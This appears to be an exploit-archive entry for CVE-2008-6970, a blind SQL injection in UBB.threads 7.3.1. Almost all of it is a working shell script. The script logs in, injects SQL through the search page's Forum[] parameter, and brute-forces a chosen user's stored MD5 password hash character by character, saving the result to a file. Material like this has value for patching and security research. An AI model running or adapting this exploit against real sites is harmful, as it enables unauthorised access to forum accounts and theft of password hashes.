# CVE-2008-6970 UBB.threads 7.3.1 SQL注入漏洞
DESCRIPTION Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID. FILECVE-2008-6970.sh - Shell code program.SOURCE
#!/bin/sh # # UBB 7.3.1 dosearch.php blind SQL injection brute force attack # hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9) main='http://[removed]/ubbthreads/ubbthreads.php' login='ubb=start_page&Loginname=[removed]&Loginpass=[removed]&firstlogin=1&from=http%3A%2F%2F[removed]%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&buttlogin=Log+In' base="$main?ubb=dosearch&fromsearch=1&Words=body" inject="&Forum[]=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*" hash=() replace(){ echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/" } push(){ echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/" } brute(){ for char in ${hex[*]}; do #replace string inj=`replace "$inject" $char` #inject wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt "$base$inj" #if match then return characters to hash array if [ -z `cat ubb | grep "There are no results"` ]; then hash+=($char) return fi rm ubb done } # INIT #get PHPSESSID cookie wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main #login & get UBB cookies & inject SQL to bypass dosearch.inc.php access restriction wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main #blind SQL injection brute force attack for ((i=0; i<32;i++)); do brute inject=`push "$inject" "R"` done #clean rm cookies.txt #print the hash printf "%s" "${hash[@]}" >> hash.txt
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